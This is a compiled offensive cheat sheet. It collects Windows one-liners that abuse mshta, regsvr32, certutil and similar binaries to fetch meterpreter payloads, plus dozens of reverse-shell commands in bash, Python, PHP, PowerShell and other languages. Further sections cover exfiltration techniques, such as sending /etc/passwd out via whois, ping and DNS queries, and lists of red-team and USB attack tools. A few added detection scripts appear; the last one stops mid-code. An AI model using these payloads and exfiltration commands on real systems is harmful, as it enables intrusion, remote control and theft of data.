One-line Windows reverse shells

from https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Table of Contents

Mshta.exe

  • Launch HTA attack via HTA Web Server of Metasploit

Rundll32.exe

  • Launch Rundll32 Attack via SMB Delivery of Metasploit

Regsvr32.exe

  • Launch Regsvr32 via Script Web Delivery of Metasploit

Certutil.exe

  • Launch certutil Attack via Msfvenom

Powershell.exe

  • Launch Powercat attack via Powershell
  • Launch cscript.exe via Powershell
  • Launch Batch File Attack via Powershell

Msiexec.exe

  • Launch msiexec attack via msfvenom

Wmic.exe

  • Launch Wmic.exe attack via Koadic

Mshta.exe

Mshta.exe runs the Microsoft HTML Application Host, the Windows utility responsible for running HTA (HTML Application) files: HTML files that can carry JavaScript or VBScript. These files are interpreted by the Microsoft mshta.exe tool.

Metasploit contains the "HTA Web Server" module, which generates a malicious HTA file. This module hosts an HTML Application (HTA) that, when opened, runs a payload via PowerShell. When a user navigates to the HTA file they are prompted by IE twice before the payload is executed.

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Now run the malicious code through mshta.exe on the victim's machine (vulnerable to RCE) to obtain a meterpreter session.

Once you execute the malicious HTA file on the remote machine with the help of mshta.exe, you get the reverse connection on your local machine (Kali Linux).

mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta

As you can observe, we have the meterpreter session of the victim as shown below:

Rundll32.exe

Rundll32.exe is a Windows component that lets you invoke a function exported from a DLL, either 16-bit or 32-bit, loading the library into memory.

Launch Rundll32 Attack via SMB Delivery of Metasploit

Metasploit also contains the "SMB Delivery" module, which generates a malicious DLL file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and PowerShell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain a meterpreter session.

Once you execute the DLL file on the remote machine with the help of rundll32.exe, you get the reverse connection on your local machine (Kali Linux).

rundll32.exe \\192.168.1.109\vabFG\test.dll,0

As you can observe, we have the meterpreter session of the victim as shown below:

Regsvr32.exe

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s] [/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll to uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Launch Regsvr32 via Script Web Delivery of Metasploit

This module quickly fires up a web server that serves a payload and provides a command that downloads and executes it, either through the specified scripting-language interpreter or via "squiblydoo" through regsvr32.exe to bypass application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to type the command manually, e.g. through command injection.

Regsvr32 uses the "squiblydoo" technique to bypass application whitelisting: the signed Microsoft binary regsvr32 can request a .sct file and execute the PowerShell command embedded in it. Both web requests (i.e., the .sct file and the PowerShell download/execute) can occur on the same port. "PSH (Binary)" writes a file to disk, allowing custom binaries to be served for download and execution.

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit

Copy the regsvr32 command that the module prints once it is running.

Once you execute the scrobj.dll file on the remote machine with the help of regsvr32.exe, you get the reverse connection on your local machine (Kali Linux).

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

As you can observe, we have the meterpreter session of the victim as shown below:

Certutil.exe

Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file in the target machine to get a meterpreter session.

Launch certutil Attack via Msfvenom

Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get the reverse shell of the victim’s machine.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Now, to fetch the shell.exe file onto the target with certutil, follow the syntax below:

Syntax: certutil [-f] [-urlcache] [-split] <URL or path of the executable file> <output file>

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe, we have a meterpreter session of the victim as shown below:

Powershell.exe

You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more in Microsoft's official documentation.

Launch Powercat attack via Powershell

Powercat is a PowerShell-native backdoor listener and reverse shell, often described as a PowerShell version of netcat: it has integrated support for generating encoded payloads (as msfvenom does) and a client-to-client relay, a Powercat mode that lets two separate listeners be connected.

Download Powercat to your local machine, then serve powercat.ps1 with a Python HTTP server so the target can fetch it, and start a netcat listener, as shown below.

git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

Then execute the following command on the remote side to get a netcat session.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

As you can observe, we have a netcat session of the victim as shown below:

Batch File

Similarly, PowerShell lets the client execute a .bat file, so let's generate a malicious batch file with msfvenom as given below and start a netcat listener.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Then execute the following command on the remote side to get a netcat session.

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))"

As you can observe, we have a netcat session of the victim as shown below:

Cscript

Similarly, PowerShell lets the client execute cscript.exe to run .wsf, .js and VBScript files, so let's generate a malicious VBS file with msfvenom as given below and start multi/handler as the listener.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

Then execute the following command on the remote side to get a meterpreter session.

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe, we have a meterpreter session of the victim as shown below:

Msiexec.exe

As we all know, Windows ships with the Windows Installer engine, which MSI packages use to install applications. The executable program that interprets packages and installs products is msiexec.exe.

Launch msiexec attack via msfvenom

Let’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as the listener.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

Once you execute the 1.msi file on the remote machine with the help of msiexec, you get the reverse connection on your local machine (Kali Linux).

msiexec /q /i http://192.168.1.109/1.msi

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe, we have a meterpreter session of the victim as shown below:

Wmic.exe

The WMIC utility is a Microsoft tool that provides a WMI command-line interface used for a variety of administrative functions on local and remote machines; it is also used for WMI queries such as reading system settings, stopping processes and executing scripts locally or remotely. It can therefore invoke XSL (eXtensible Stylesheet Language) scripts.

Launch Wmic.exe attack via Koadic

Now we will generate a malicious XSL file with the help of Koadic, a command and control tool quite similar to Metasploit and PowerShell Empire.

To learn how Koadic works, read our article here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation is complete, run ./koadic to start Koadic, then load the stager/js/wmic stager with the following commands and set SRVHOST to the address the stager should call home to.

use stager/js/wmic
set SRVHOST 192.168.1.107
run

Execute the following WMIC command to download and run the malicious XSL file from the remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file is executed on the target machine, you get a zombie connection, just like a Metasploit session.
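The seven one-liners above share a shape that is easy to key on in process-creation telemetry: a signed Windows binary pointed at a remote URL or UNC path. As an added defender-side example (not code from the article or from any of the tools it names), the following detector flags those argument shapes while staying quiet on routine use of the same binaries; the log records are constructed for this page.

```python
"""Spot the remote-payload LOLBin invocations catalogued above in
process-creation logs (mshta, rundll32, regsvr32, certutil, powershell,
msiexec, wmic).  Hypothetical detector written for this page; the log
lines below are constructed, not real telemetry."""
import re

# One rule per binary.  Each pattern keys on the argument shape that
# separates "fetch and run a remote payload" from routine admin use,
# so a plain 'regsvr32 /s local.dll' or 'certutil -hashfile' stays quiet.
RULES = [
    ("mshta_remote_hta",    r"\bmshta(?:\.exe)?\s+\S*https?://"),
    ("rundll32_unc_dll",    r"\brundll32(?:\.exe)?\s+\\\\\S+\.dll\b"),
    ("regsvr32_squiblydoo", r"\bregsvr32(?:\.exe)?\b.*/i:https?://\S+\s+scrobj\.dll"),
    ("certutil_urlcache",   r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://"),
    ("powershell_download", r"\bpowershell(?:\.exe)?\b.*\.Download(?:String|File)\s*\("),
    ("msiexec_remote_msi",  r"\bmsiexec(?:\.exe)?\b.*/i\s+https?://"),
    ("wmic_remote_xsl",     r"\bwmic(?:\.exe)?\b.*/format:\s*\"?https?://\S*\.xsl"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def scan(log_lines):
    """Scan 'timestamp|host|user|commandline' records.

    Returns a list of (host, user, rule, commandline) tuples, one per hit.
    Malformed records are skipped rather than raising."""
    hits = []
    for line in log_lines:
        fields = line.rstrip("\n").split("|", 3)
        if len(fields) != 4:
            continue
        _ts, host, user, cmd = fields
        for rule in classify(cmd):
            hits.append((host, user, rule, cmd))
    return hits


# Constructed sample: the seven one-liners from the article above, plus
# four benign uses of the same binaries that must NOT fire.
SAMPLE_LOG = [
    r"2024-05-01T10:00:01Z|WS01|alice|mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta",
    r"2024-05-01T10:00:02Z|WS01|alice|rundll32.exe \\192.168.1.109\vabFG\test.dll,0",
    r"2024-05-01T10:00:03Z|WS02|bob|regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll",
    r"2024-05-01T10:00:04Z|WS02|bob|certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe",
    r'''2024-05-01T10:00:05Z|WS03|carol|powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"''',
    r"2024-05-01T10:00:06Z|WS03|carol|msiexec /q /i http://192.168.1.109/1.msi",
    r'2024-05-01T10:00:07Z|WS04|dave|wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"',
    r"2024-05-01T10:01:00Z|WS01|alice|regsvr32.exe /s C:\Windows\System32\jscript.dll",
    r"2024-05-01T10:01:01Z|WS02|bob|certutil -hashfile shell.exe SHA256",
    r"2024-05-01T10:01:02Z|WS03|carol|powershell.exe -NoProfile -Command Get-Process",
    r"2024-05-01T10:01:03Z|WS04|dave|rundll32.exe shell32.dll,Control_RunDLL",
]

if __name__ == "__main__":
    for host, user, rule, cmd in scan(SAMPLE_LOG):
        print(f"[{rule}] {host} {user}: {cmd}")
```

The patterns are deliberately narrow (remote scheme or UNC path plus the binary's download/execute switch); a real deployment would pair them with parent-process and network context to catch obfuscated variants.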

Reverse shells

Awk

awk 'BEGIN {s = "/inet/tcp/0/LHOST/LPORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Bash

bash -i >& /dev/tcp/LHOST/LPORT 0>&1
0<&196;exec 196<>/dev/tcp/LHOST/LPORT; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/LHOST/LPORT && while read line 0<&5; do $line 2>&5 >&5; done

Java

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/LHOST/LPORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()

Javascript

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(LPORT, "LHOST", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

Netcat

nc -e /bin/sh LHOST LPORT
/bin/sh | nc LHOST LPORT
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f
rm -f /tmp/backpipe; mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc LHOST LPORT 1>/tmp/backpipe
rm -f /tmp/backpipe; mknod /tmp/backpipe p && nc LHOST LPORT 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

Perl

perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"LHOST:LPORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"LHOST:LPORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("LHOST",LPORT);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("LHOST",LPORT);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("LHOST",LPORT);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("LHOST",LPORT);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
// pentestmonkey one-liner ^_^
<?php set_time_limit (0); $VERSION = "1.0"; $ip = "LHOST"; $port = LPORT; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise.  This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>

Powershell

$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();

Python

# TCP
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();"
# SCTP (requires the pysctp module)
python -c "import os,pty,socket,sctp;s=sctp.sctpsocket_tcp(socket.AF_INET);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();"
# UDP
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();"

Ruby

ruby -rsocket -e 'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# Windows
ruby -rsocket -e 'c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Socat

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:LHOST:LPORT

TCLsh

echo 'set s [socket LHOST LPORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet LHOST LPORT 0</tmp/p | /bin/sh 1>/tmp/p
telnet LHOST LPORT | /bin/bash | telnet LHOST LPORT

xterm

# Make sure the X server is listening on TCP.
xhost +RHOST
xterm -display LHOST:0
# or
DISPLAY=LHOST:0 xterm

Listeners

socat file:`tty`,echo=0,raw tcp-listen:LPORT
nc -lvvp LPORT

Search engines for Hackers

  • https://censys.io/
  • https://www.shodan.io/
  • https://viz.greynoise.io/table
  • https://www.zoomeye.org/
  • https://wigle.net/
  • https://publicwww.com/
  • https://hunter.io/
  • https://haveibeenpwned.com/
  • https://pipl.com/
  • https://osintframework.com/
  • http://dns.bufferover.run/dns?q=baidu.com

Redteam Toolkit

https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
https://github.com/infosecn1nja/Red-Teaming-Toolkit
https://github.com/redcanaryco/atomic-red-team
https://github.com/vysecurity/RedTips
https://github.com/threatexpress/red-team-scripts
https://github.com/KCarretto/Arsenal
https://github.com/marcosValle/awesome-windows-red-team
https://github.com/abhijithbr/Red-team-Learning-resources
https://github.com/rosonsec/RedTeam


Embedded & Peripheral Devices Hacking

  • magspoof a portable device that can spoof/emulate any magnetic stripe, credit card or hotel card “wirelessly”, even on standard magstripe (non-NFC/RFID) readers. https://github.com/samyk/magspoof
  • WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. https://github.com/secgroundzero/warberry
  • P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). https://github.com/mame82/P4wnP1
  • malusb HID spoofing multi-OS payload for Teensy. https://github.com/ebursztein/malusb
  • Fenrir is a tool designed to be used “out-of-the-box” for penetration tests and offensive engagements. Its main feature and purpose is to bypass wired 802.1x protection and to give you an access to the target network. https://github.com/Orange-Cyberdefense/fenrir-ocd
  • poisontap exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. https://github.com/samyk/poisontap
  • WHID WiFi HID Injector – A USB Rubber Ducky / BadUSB on steroids. https://github.com/whid-injector/WHID

Software For Team Communication

  • RocketChat is free, unlimited and open source. Replace email & Slack with the ultimate team chat software solution. https://rocket.chat
  • Etherpad is an open source, web-based collaborative real-time editor, allowing authors to simultaneously edit a text document https://etherpad.net


From: https://github.com/shr3ddersec/Shr3dKit

Freddy the Serial(isation) Killer – Deserialization Bug Finder

A Burp Suite extension to aid in detecting and exploiting serialisation libraries/APIs.

This useful extension was originally developed by Nick Bloor (@nickstadb) for NCC Group and is mainly based on the work of Alvaro Muñoz and Oleksandr Mirosh, Friday the 13th: JSON Attacks, which they presented at Black Hat USA 2017 and DEF CON 25. In their work they reviewed a range of JSON and XML serialisation libraries for Java and .NET and found that many of them support serialisation of arbitrary runtime objects and as a result are vulnerable in the same way as many serialisation technologies are – snippets of code (POP gadgets) that execute during or soon after deserialisation can be controlled using the properties of the serialized objects, often opening up the potential for arbitrary code or command execution.

Further modules supporting more formats including YAML and AMF are also included, based on the paper Java Unmarshaller Security – Turning your data into code execution and tool marshalsec by Moritz Bechler.

This Burp Suite extension implements both passive and active scanning to identify and exploit vulnerable libraries.

https://github.com/nccgroup/freddy

File transfer techniques in penetration testing

Source: https://paper.seebug.org/834/

Setting up an HTTP server

Python

python2:

python -m SimpleHTTPServer 1337

The command above starts an HTTP server in the current directory on port 1337

python3:

python -m http.server 1337

The command above starts an HTTP server in the current directory on port 1337

PHP 5.4+

When the PHP version is 5.4 or later, PHP itself can start an HTTP server in the current directory on port 1337

php -S 0.0.0.0:1337

Ruby

The following command starts an HTTP server in the current directory on port 1337

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -e httpd . -p 1337

Perl

perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'

Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver

busybox httpd

busybox httpd -f -p 8000

Download files from HTTP server

The following lists several ways to download files from an HTTP server on Windows and Linux using only tools that ship with the system

Windows

powershell

Download and execute:

powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

certutil

Download and execute:

certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

bitsadmin

Download and execute:

bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

bitsadmin downloads are fairly slow

regsvr32

regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

Linux

Curl

curl http://1.2.3.4/backdoor

Wget

wget http://1.2.3.4/backdoor

awk

When downloading a file with awk, first start an HTTP server with any of the commands listed above

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

Setup HTTP PUT server

The following lists several ways to upload files to an HTTP server

Setting up an HTTP PUT server with Nginx

mkdir -p /var/www/upload/ # create the upload directory
chown www-data:www-data /var/www/upload/ # set the directory's owner and group
cd /etc/nginx/sites-available # enter the nginx virtual host directory

# write the configuration to the file_upload file
cat <<EOF > file_upload
server {
    listen 8001 default_server;
    server_name kali;
    location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# done writing
cd ../sites-enabled # enter the directory of enabled nginx virtual hosts
ln -s /etc/nginx/sites-available/file_upload file_upload # enable the file_upload virtual host
systemctl start nginx # start Nginx

Setting up an HTTP PUT server with Python

Save the following code to the file HTTPutServer.py:

# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import os
import signal
import sys
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler


class PUTHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        # Read exactly Content-Length bytes of request body.
        length = int(self.headers['Content-Length'])
        content = self.rfile.read(length)
        # Keep only the base name of the request path so an upload cannot
        # escape the current directory; fall back to a default name for "/".
        filename = os.path.basename(self.path[1:]) or "upload.bin"
        with open(filename, "wb") as f:
            f.write(content)
        self.send_response(200)
        self.end_headers()


def run_on(host, port):
    print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(host, port))
    httpd = HTTPServer((host, port), PUTHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0]))
        sys.exit(1)
    host = sys.argv[1]
    ports = [int(arg) for arg in sys.argv[2:]]
    try:
        for port_number in ports:
            server = Thread(target=run_on, args=[host, port_number])
            server.daemon = True  # Do not make us wait for you to exit
            server.start()        # start a listener for every port given
        signal.pause()  # Wait for interrupt signal, e.g. KeyboardInterrupt
    except KeyboardInterrupt:
        print("\nPython HTTP PUT Server Stopped.")
        sys.exit(1)

To run:

$ python HTTPutServer.py 10.10.10.100 1337
Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...

Uploading files to the HTTP PUT server

Linux

Curl

$ curl --upload-file secret.txt http://ip:port/

Wget

$ wget --method=PUT --body-file=secret.txt http://ip:port/

Windows

Powershell

$body = Get-Content secret.txt -Raw
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

File transfer with Bash /dev/tcp

First, listen on a port

Receiver:

nc -lvnp 1337 > secret.txt 

Sender:

cat secret.txt > /dev/tcp/ip/port

File transfer over SMB

Setting up a simple SMB server

Setting up a simple SMB server uses the smbserver.py file from the Impacket project

Impacket is installed by default on Kali Linux

syntax: impacket-smbserver ShareName SharePath

$ mkdir smb # create the smb directory
$ cd smb # enter the smb directory
$ impacket-smbserver share `pwd` # start an SMB server in the current directory with the share name "share"

Downloading files from the SMB server

copy \\IP\ShareName\file.exe file.exe

Uploading files to the SMB server

net use x: \\IP\ShareName

copy file.txt x:

net use x: /delete

File transfer with the whois command

Receiver (Host B):

nc -vlnp 1337 | sed "s/ //g" | base64 -d 

Sender (Host A):

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64` 

File transfer with the ping command

Sender:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

Receiver:

Save the following code as ping_receiver.py

import sys

try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)

To run:

python3 ping_receiver.py

File transfer with the dig command

Scenario: /etc/passwd is sent from the sender to the receiver.

Sender:

xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done

Receiver:

The following code uses Python's scapy module, which must be installed manually

Save the code to the file dns_reciver.py

import sys

try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)

def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')

sniff(iface="eth0", prn=process_packet)

To run:

python3 dns_reciver.py
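The dig-based transfer above leaves a distinctive trace in resolver logs: a burst of queries whose leftmost label is a long, all-hex string that never repeats, all under one parent domain. As an added defender-side example (not code from the article), the following scores query logs for that pattern; the sample log is constructed inline by encoding a small passwd-like text the same way the sender loop does.

```python
"""Flag DNS query streams that look like the hex-label tunnel above
(31-byte chunks, hex-encoded, sent as the leftmost label of a domain).
Added defender-side example for this page, not code from the article;
the query log is constructed inline."""
import binascii
import re
from collections import defaultdict

# A single label of 16..63 hex characters: long enough to rule out short
# hashes used by CDNs, within the 63-byte label limit a tunnel must obey.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$", re.IGNORECASE)


def analyze(query_lines, min_hex_queries=3, min_hex_ratio=0.8):
    """query_lines: 'timestamp client qname' records from a resolver log.

    Groups queries by the registrable-looking parent (last two labels) and
    reports parents where most queries carry a long hex leftmost label and
    almost none of those labels repeat (real content hashes repeat; an
    exfil stream does not)."""
    stats = defaultdict(lambda: {"total": 0, "hex": 0, "labels": set(), "clients": set()})
    for line in query_lines:
        try:
            _ts, client, qname = line.split()
        except ValueError:
            continue  # skip malformed records
        labels = qname.rstrip(".").split(".")
        if len(labels) < 2:
            continue
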